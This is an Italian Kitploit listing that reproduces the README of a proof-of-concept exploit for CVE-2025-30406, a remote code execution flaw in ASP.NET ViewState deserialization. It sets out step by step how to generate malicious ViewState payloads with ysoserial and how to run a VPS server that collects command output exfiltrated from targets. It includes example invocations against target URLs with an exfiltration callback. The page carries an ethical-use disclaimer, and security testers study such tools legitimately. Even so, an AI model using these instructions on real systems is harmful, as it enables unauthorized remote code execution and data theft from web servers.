Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2025-30406 — CVE-2025-30406 ViewState Exploit PoC | Kitploit
Strumenti/GitHubGitHub/mchklt/cve-2025-30406
Generazione di PayloadAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingApprendimento e Formazione
GitHubmchklt/cve-2025-30406

CVE-2025-30406

CVE-2025-30406 ViewState Exploit PoC

Vedi Repository
901841 anno faRevisionato da Kitploit

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2025-30406 PoC di Exploit ViewState

Panoramica

Questo è uno script Proof-of-Concept (PoC) che dimostra un exploit di deserializzazione ViewState per CVE-2025-30406 in applicazioni ASP.NET. Utilizza ysoserial per generare un payload ViewState dannoso e lo invia a un URL specificato dall'utente per eseguire un comando fornito. Per risultati ottimali, l'output del comando può essere esfiltrato verso un server HTTP personalizzato (server.py) in esecuzione su un VPS, che mostra i risultati in un formato stilizzato con timestamp, prompt verdi e testo di output bianco. Questo script è destinato esclusivamente a scopi educativi e deve essere utilizzato solo su sistemi per i quali si dispone di autorizzazione esplicita per eseguire test di sicurezza. L'uso non autorizzato è illegale e non etico.

Dettagli CVE

  • CVE ID: CVE-2025-30406
  • Descrizione: una vulnerabilità di deserializzazione nella gestione di ViewState in ASP.NET che consente l'esecuzione di codice remoto quando sono note una chiave di convalida e un generatore validi.
  • Sistemi interessati: applicazioni ASP.NET con configurazioni ViewState vulnerabili.
  • Prerequisiti per lo sfruttamento:
    • Accesso a una chiave di convalida e un generatore ViewState validi.
    • Un endpoint vulnerabile che accetta parametri ViewState.

Contenuti del Repository

  • exploit.py: lo script PoC principale per generare e inviare il payload ViewState.
Scarica lo strumento
  • server.py: un server HTTP per ricevere e visualizzare l'output del comando esfiltrato in un formato stilizzato.
  • README.md: questo file, con istruzioni di configurazione e utilizzo.
  • Prerequisiti

    • Python 3.x
    • Libreria requests (pip install requests)
    • Eseguibile ysoserial (Windows o equivalente per la tua piattaforma)
    • Un endpoint di applicazione ASP.NET vulnerabile
    • Un VPS o server per eseguire server.py (consigliato per l'esfiltrazione)
    • Autorizzazione per testare il sistema di destinazione

    Installazione

    1. Clona questo repository:
      root@kitploit:~
      git clone https://github.com/yourusername/cve-2025-30406-poc.git
      cd cve-2025-30406-poc
      
    2. Installa il pacchetto Python richiesto:
      root@kitploit:~
      pip install requests
      
    3. Scarica ysoserial e posizionalo nella stessa directory di exploit.py o specifica il suo percorso:
      • ysoserial GitHub

    Configurazione su un VPS (Consigliato)

    Per ricevere l'output del comando esfiltrato in un formato stilizzato, esegui server.py su un VPS:

    1. Copia server.py sul tuo VPS (ad esempio tramite scp):
      root@kitploit:~
      scp server.py user@your-vps-ip:/home/user/
      
    2. Assicurati che Python 3 sia installato:
      root@kitploit:~
      sudo apt update && sudo apt install python3 python3-pip
      
    3. Esegui il server (porta predefinita 8000):
      root@kitploit:~
      python3 server.py
      
    4. Assicurati che il firewall del VPS consenta il traffico in entrata sulla porta 8000:
      root@kitploit:~
      sudo ufw allow 8000
      
    5. Prendi nota dell'IP pubblico o del dominio del VPS (ad esempio http://tuo-vps-ip:8000) da usare con il flag -e in exploit.py.

    Utilizzo

    Esecuzione dell'Exploit

    Esegui exploit.py con gli argomenti richiesti. Il flag -e è opzionale ma fortemente consigliato per esfiltrare l'output del comando verso server.py per una visualizzazione stilizzata.

    root@kitploit:~
    python exploit.py -u <target_url> -c <command> [-y <ysoserial_path>] [-e <callback_url>]
    

    Argomenti

    • -u, --url: URL di destinazione (es. http://target.com/page.aspx) [Obbligatorio]
    • -c, --command: Comando da eseguire (es. whoami) [Obbligatorio]
    • -y, --ysoserial: Percorso dell'eseguibile ysoserial (default: ./ysoserial.exe) [Opzionale]
    • -e, --exfil: URL di callback per esfiltrare l'output del comando (es. http://tuo-vps:8000) [Opzionale]

    Esempi

    1. Esecuzione senza esfiltrazione (esecuzione cieca):
      root@kitploit:~
      python exploit.py -u http://example.com/loginpage.aspx -c "whoami" -y ./ysoserial.exe
      
    2. Esecuzione con esfiltrazione verso un VPS che esegue server.py (consigliato):
      root@kitploit:~
      python exploit.py -u http://example.com/loginpage.aspx -c "whoami" -y ./ysoserial.exe -e http://tuo-vps:8000
      

    Esecuzione del Server

    Sul tuo VPS o macchina locale, avvia il server HTTP per ricevere l'output esfiltrato:

    root@kitploit:~
    python3 server.py
    

    Il server mostrerà l'output del comando con timestamp, un prompt $ verde e testo bianco per una migliore leggibilità.

    Come Funziona

    1. Script di exploit (exploit.py):
      • Utilizza ysoserial con una chiave di convalida e un generatore hardcoded per creare un payload ViewState.
      • Se viene fornito -e, il comando viene avvolto per catturare l'output e inviarlo all'URL di callback tramite Invoke-WebRequest.
      • Invia il payload all'URL di destinazione in una richiesta POST, incorporato nel parametro __VIEWSTATE.
      • Stampa lo stato della risposta del server e una porzione del corpo della risposta.
    2. Server HTTP (server.py):
      • Ascolta le richieste GET contenenti l'output del comando.
      • Decodifica il percorso URL e lo divide in righe.
      • Stampa ogni riga con un timestamp, un prompt $ verde e un testo di output bianco.
      • Risponde con HTTP 200 e 'OK'.

    Avviso sull'Uso Etico

    • Questo script è un proof-of-concept per CVE-2025-30406 per scopi educativi e di test di sicurezza autorizzati.
    • Non utilizzare questo script su sistemi senza esplicita autorizzazione del proprietario del sistema.
    • L'uso improprio può violare leggi, tra cui il Computer Fraud and Abuse Act (CFAA) negli Stati Uniti o leggi simili altrove.
    • Ottieni sempre il consenso scritto prima di testare qualsiasi sistema.
    • Segnala le vulnerabilità in modo responsabile attraverso la divulgazione coordinata o programmi di bug bounty.

    Limitazioni

    • La chiave di convalida e il generatore hardcoded potrebbero funzionare solo per specifiche applicazioni vulnerabili. Gli utenti potrebbero aver bisogno di valori specifici dell'applicazione.
    • L'exploit prende di mira applicazioni ASP.NET vulnerabili alla deserializzazione ViewState.
    • Lo script presuppone che il server di destinazione elabori correttamente il payload ViewState.
    • La compatibilità multipiattaforma dipende dalla disponibilità di ysoserial (principalmente basato su Windows).
    • L'esfiltrazione richiede un server accessibile pubblicamente per l'URL di callback -e.

    Licenza

    Questo progetto è concesso in licenza con licenza MIT. Consulta il file LICENSE per i dettagli.

    Contatti

    Per domande o feedback, apri un problema (issue) su questo repository.